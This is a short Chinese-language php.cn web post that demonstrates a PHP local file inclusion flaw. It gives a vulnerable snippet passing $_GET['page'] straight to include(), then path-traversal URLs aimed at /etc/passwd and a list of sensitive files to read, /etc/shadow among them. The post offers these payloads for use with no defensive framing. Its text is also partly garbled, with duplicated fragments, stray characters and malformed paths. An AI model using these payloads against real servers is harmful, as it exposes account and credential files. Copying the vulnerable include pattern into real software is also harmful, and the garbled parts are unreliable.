php 偽造本機檔案包含漏洞的程式碼

高洛峰
發布: 2023-03-01 12:56:02
原創
1224 人瀏覽過

程式碼如下: 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以這樣使用
http
?> 

你可以這樣使用
http://www.xxx.com /index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx .com/index.php?page=..../../etc/passwd 

取得更多資料: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/c/group
/etc/security/group 
/etc/security/passwd 

/etc/security/user 🎜/etc/security/environ 🎜/etc/security/userits 
相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!